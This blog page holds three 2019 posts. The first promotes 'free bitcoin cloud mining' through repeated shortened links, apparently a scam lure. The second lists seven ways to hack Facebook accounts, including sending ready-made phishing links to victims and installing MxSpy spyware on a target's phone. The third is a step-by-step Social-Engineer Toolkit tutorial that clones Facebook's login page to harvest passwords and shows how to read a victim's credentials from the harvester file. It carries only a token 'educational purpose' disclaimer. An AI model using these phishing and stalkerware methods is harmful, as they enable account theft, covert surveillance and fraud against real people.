Wednesday 22 May 2019

New Free Bitcoin Cloud Mining Site 2019 | Top 2 free Bitcoin Mining Sites 2019 | Live Payment Proof


New Free Bitcoin Cloud Mining Site 2019 | Top 2 free Bitcoin Mining Sites 2019 | Live Payment Proof

https://za.gl/WQLyKh7


Hi, Friends today we are going to talk about new bitcoin mining 2019 Actually its a cloud mining site 2019.As you know I always try to introduce New Free Bitcoin (BTC) Cloud Mining Site that often yield free bitcoins btc.
i have published a lot about bitcoin or btc mining websites in 2018. That includes free cloud mining bonus and free bitcoins or btc also publish a lot about how to choose real mining sites and cloud mining sites and how to earn free btc with trusted cloud mining sites.i have a long history of publishing videos about cloud mining sites in 2017 and when we started previous https://pryup.blogspot.com/ often my content moves around cloud mining or btc mining websites in 2016
https://za.gl/WQLyKh7


1st websites link
click now

2nd websites link
click now

see video 
                                  Thanks for reading this post.

Sunday 19 May 2019

Hack facebook account

You are not alone, and there are hundreds, if not thousands of people who search for how to hack a Facebook account or how to hack Facebook messenger.
Hacking someone’s Facebook account isn’t as difficult as most people think.
There are many ways for hacking facebook's passwords and the following are the seven most efficient ways for doing so.
1. Hack facebook password
Plain Password Grabbing
Plain password grabbing is another common technique with which you can get knowledge how to hack facebook password. Many people are not aware that with this technique they can learn how to hack facebook password and often opt-in for other methods.
So how exactly this method works?
    • The hacker goes after a weaker website where someone is a member and gets access to their complete database username and passwords.
    • That is why people are advised to avoid low-quality websites from third parties.
    • Even popular and reputable websites can be subject to hacking of someone who has little knowledge about how to hack facebook password
Many website developers are making mistakes by storing all the passwords in a database without proper encryption. This makes it very easy for anyone that wants to know how to hack facebook password to do that by following few simple steps.
 Facebook passwords that are easiest to hack are those that are used on multiple sites, because that way they are more vulnerable to hacking.


2. Hack facebook account online now​
Phishing
Second way for how to hack facebook accounts and to hack facebook password instantly is through the method called phishing. This is a very common method used by many that want to know how to hack facebook password.
It is done relatively easily, so you do not have to some special technical skills or computer knowledge to learn how to hack facebook accounts.
Phishing is popular because almost anyone can create a fake phishing page in order to steal sensitive information. The pages look credible and exactly like the real ones, but their purpose is to hack facebook password instantly.
You are probably wondering how exactly phishing works. Well, this method with which you will learn how to hack facebook password includes creating an exact duplicate of some web page with a purpose to hack facebook password instantly or any other information you are interested in.
    • For example if you want to know how to hack facebook accounts you need to create a fake facebook page that will look similar like the original page​
    • When someone visits that fake page they may believe it is the real login page, so they will put down their username and facebook password.
    • As soon as they type their personal information on the fake phishing page you can hack facebook password instantly and monitor their activities.
It is as simple as it sounds, so as mentioned before, anyone can learn how to hack facebook accounts through creating fake phishing pages that look legit.


Super perfect phishing pages
Most of the people won’t suspect this page since there is an https prefix with a green color secure icon and also there is no mistake in www.facebook.com. But, this is a phishing page.

.

Create Phishing Facebook with Shadowave 
Step 1: Open your browser and go to Shadowave.com

Step 2: Now you have to sign up for Shadowave  to get your ID

Step 3: When you logged in to this website. You see scamas1 and scamas2. You can copy any link from any of these two scamas. Copy any link and send it to the victim.

Step 5: You can check your victim ID and password in the “My Victims” option.

Note:
When someone opens this link, It will open like in the image below. This is a phishing link and this website just provide different phishing links. You can also create your own links. This is a very common technique. But try this to learn and try it on your own system, do not try on anyone.


3. ​Hack facebook messenger
Using MxSpy to hack facebook messenger
If you want to successfully learn how to hack someones facebook, you should definitely consider using MxSpy for that. With this tool you will get the shortest way towards how to hack facebook and how to hack facebook messenger.
MxSpy is an application that is very easy to use, it can be easily installed and it comes with many great features.
    • As soon as you install it on the targeted phone you can proceed towards how to hack facebook
    • Just sign up and create own account at the app website and then you can get all the information you are interested in
    • MxSpy give you remote controls, it is a reliable app and the interface is very user-friendly
What sets MxSpy apart from other apps claiming they will teach you how to hack someones facebook, is that MxSpy has numerous quality features.
Not only you can learn how to hack facebook but you can do many other things as well. The unique set of features enables you to:
    • Read all sent and received messages in the targeted phone
    • It also lets you monitor and check all call logs in the phone
    • The GPS feature is very helpful if you are interested in tracking the monitored phone, and with this feature you will get precise time and date where the phone is located
    • Accessing messenger chats and group chats of facebook, viber, skype, snapchat, kik or whatsapp is also easily done with MxSpy
    • A couple of other great features include monitoring online activity and inspecting photos and videos in the monitored phone
MxSpy is definitely one of the best apps with which you can learn easily how to hack facebook messenger. This app also comes with a free trial so you can test it and see what it offers.



4. How to hack fb account with android phone
Malicious Application Hack
People should know that all those facebook apps that are popular and used by many customers are not owned by facebook. They are usually owned by third parties, although there are exceptions to this rule.
Anyhow, with the help of some good application you will easily know how to hack fb account with android phone. Applications usually ask for permission from the users, and as soon as the users agree they will start receiving spam and other things on their facebook profile.
 With malicious application hack you will not have any trouble learning how to hack fb account with android phone. So how it works?
    • 1
      First, whenever you see the option to login with your facebook credentials on some website, you should know that these applications do not belong to facebook
    • 2
      As soon as you click login with facebook you will see a pop-up box asking you for permission to access different details
    • 3
      When you click okay all the personal details and all actions can be performed at your account in your name.

5. Hack facebook password instantly
Browser Extension Facebook Hacker
With this technique for hack facebook password you cannot get full access to someones facebook account, but you can indirectly control their account.
There are many add-ons for Mozilla Firefox and Google Chrome which can secretly spy on a person's online activity, like facebook pages in their name and so on. With this method you can still do a good hack facebook password, but you should know how it works first
    • As soon as someone visits a malicious web page, they are asked to install certain add-on.
    • When that add-on is installed it can perform many different spying or hacking tasks.

Some main things which can be performed with this hack facebook password include liking a specific page, posting something on facebook wall, follow a person on facebook, join a facebook group, invite people to join a group, etc.
People may not be even aware that they have been subject to a hack facebook password until they check out their activity log from time to time.

6. Hack facebook account from mobile
Malicious Mobile Application
With malicious mobile application you get an easy way to hack facebook account from mobile. There are plenty of mobile apps today with which you can get access to facebook accounts.
All facebook accounts have an access token inside the memory of the mobile phone that is used for authentication. If you are able to get that information you are getting a very easy way to hack facebook account from mobile.
This application does not ask for username and password for obtaining data of the user. All it requires is the access token for retrieving the data. The facebook mobile application is storing the token inside the phone's memory and it can only be accessed with an application.
Usually apps with administrative privileges are the only ones that can access some user's data. There are some powerful apps out there which can easily steal facebook tokens so you get an easy way to hack facebook account from mobile.


7. How to hack facebook account
Trojan Horses

Every facebook hacker knows what Trojan horses are. These are malicious programs used for controlling and spying users' computers. Almost every facebook hacker uses Trojan horses to mislead the users and steal their information.
These Trojan horses are also known as remote key loggers as they can record everything a person types on their computer and then sends this information to the facebook hacker.
    • Even software that looks completely legit may come with a Trojan malware.
    • Not just that, but media files and PDF files might be Trojans as well
    • Trojan horses usually run in the background of the computer processes, steal information and send it to the facebook hacker
    • You can use emails, flash drives or anything else to send the Trojan horses and infect the computer
These Trojans are recording facebook passwords that users have typed in their browsers and send them directly to the facebook hacker who can then take full control of certain facebook accounts.
People usually protect from Trojan horses by avoiding installing programs and apps from unknown sources, avoid playing unknown media files, avoid opening files and documents that come from unverified sources, or by avoiding inserting flash drives that are not previously scanned for malicious software.

Saturday 18 May 2019

How to Crack Facebook Password on a Private Network

         How to Crack Facebook Password on a Private Network 



You are not alone, and there are hundreds, if not thousands of people who search for how to hack a Facebook account or how to hack Facebook messenger.
Hacking someone’s Facebook account isn’t as difficult as most people think.
There are many ways for hacking facebook's passwords and the following are the seven most efficient ways for doing so.
https://za.gl/WQLyKh7


Hey guys . In this tutorial how to crack fb passwords on a private network that you already own.
Our idea is pretty simple . We will redirect the network through our computer thereby performing a man in the middle to crack the required credentials.
To serve this purpose we need Kali linux or any other linux with SET installed.

Wikipedia ➤➦  * please keep In Mind This Only For Educational Purpose.*

Step 1 :- Setting Up the MITM Using SE Toolkit


open the terminal and type "setoolkit" , then hit enter
output: Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

Step 2 :- Select Social Engineering Attacks

select
1) Social-Engineering Attacks
output: Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.

Step 3:- Select Website Attack Vectors

select Website Attack Vectors
output: The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by whitesheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the setconfig if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu

Step 4:- Select Credential Harvester Attack Method

now select Credential Harvester Attack Method
output : The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

Step 5 :- Select Site Cloner

Select Site Cloner
output: - Credential harvester will allow you to utilize the clone capabilities within SET
  • to harvest credentials or parameters from a website as well as place them into a report
  • This option is used for what IP the server will POST to.
  • If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:

Step 6 :- Now It's Time to Know Your Ip Address

just open another terminal and type "ifconfig" without the quotes
output : root@kali:~# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether dc:0e:a1:6c:1c:bf txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 0 (Local Loopback)
RX packets 30 bytes 1780 (1.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 30 bytes 1780 (1.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.4 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::e6d5:3dff:fe7b:cdef prefixlen 64 scopeid 0x20<link>
ether e4:d5:3d:7b:cd:ef txqueuelen 1000 (Ethernet)
RX packets 76749 bytes 68087536 (64.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55870 bytes 8673749 (8.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
your output almost looks like the same but is not .In my case the ip address is 192.168.0.4

Step 7:- Just Copy Your Ip and Go Back to Setoolkit and Paste It

output:
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.0.4
set:webattack> Enter the url to clone:

Step 8 :- Enter Url as [https://www.facebook.com/ ]

output : Enter the url to clone:https://www.facebook.com/
* Cloning the website: https://login.facebook.com/login.php
* This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
* Apache is set to ON - everything will be placed in your web root directory of apache.
* Files will be written out to the root directory of apache.
* ALL files are within your Apache directory since you specified it to ON.
! Apache may be not running, do you want SET to start the process? y/n: y
ok Starting apache2 (via systemctl): apache2.service.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apachedir/harvesterdate.txt
Feel free to customize post.php in the /var/www/html directory
* All files have been copied to /var/www/html
{Press return to continue}

Step 9 :- All Done!

do not close the terminal until you are done
now there is a problem with kali sana . In sana the files will be copied to /var/www folder.You will have to copy the harvester index.html and post.php files manually into html folder.
now type your ip address in your browser,you can also use bit.ly to shorten into a url as it seems appealing than an ip.

you must see something like this

https://za.gl/WQLyKh7

now to check everything is fine type something in the user and password blanks


https://za.gl/WQLyKh7

now go the var/www/html folder and find the harvester file along with date and time

now in the harvester file you can find the email and password of the victim
https://za.gl/WQLyKh7
and there you go.
the easiest way to hack fb over a private network .
any doubts are welcome to be commented

hacking fb using the same method over a public ip will also be posted to soon.


online hack go to this web

Final  word ➩  so guys, this was the easy guide for how to hack . Hope you enjoyed this trick, with the help of this trick you can do prank on your friends. This trick only for educational purpose. Don’t misuse this trick, we will not responsible for any kind of harm or lose.
              
                      Thanks for reading this post